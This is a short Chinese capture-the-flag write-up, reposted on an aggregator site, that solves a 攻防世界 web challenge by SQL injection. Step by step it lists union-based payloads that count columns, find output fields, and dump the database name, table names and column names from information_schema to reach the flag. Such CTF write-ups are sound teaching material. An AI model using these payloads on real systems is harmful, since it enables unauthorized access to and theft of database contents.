攻防世界web进阶区--记一次sql注入

Posted pyh123456

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了攻防世界web进阶区--记一次sql注入相关的知识,希望对你有一定的参考价值。

题目地址:http://111.198.29.45:56094

这是一道sql注入题。

技术图片

 

 试试1‘ order by 3#,发现页面显示正常,将3换为4时,页面报错,则说明含有3个字段。

接下来判断输出点,即输入1‘ union select 1,2,3#,发现2与3的位置是输出点。

技术图片

 

 爆数据库名: 1‘ union select 1,database(),3#

技术图片

 

 1‘ union select 1,2,table_name from information_schema.tables where table_schema=‘news‘#查询 news 数据库中的表

技术图片

 

1‘ union select 1,2,column_name from information_schema.columns where table_schema=‘news‘ and table_name=‘secret_table‘#查询列名

技术图片

 

 得flag:

技术图片

 

以上是关于攻防世界web进阶区--记一次sql注入的主要内容,如果未能解决你的问题,请参考以下文章

攻防世界(XCTF)WEB(进阶区)write up

攻防世界-web-高手进阶区011-Web_python_template_injection

攻防世界 web进阶区 NewsCenter

CTF_Web:攻防世界高手区进阶题WP(5-8)

攻防世界web进阶区

攻防世界 web进阶区 ics-06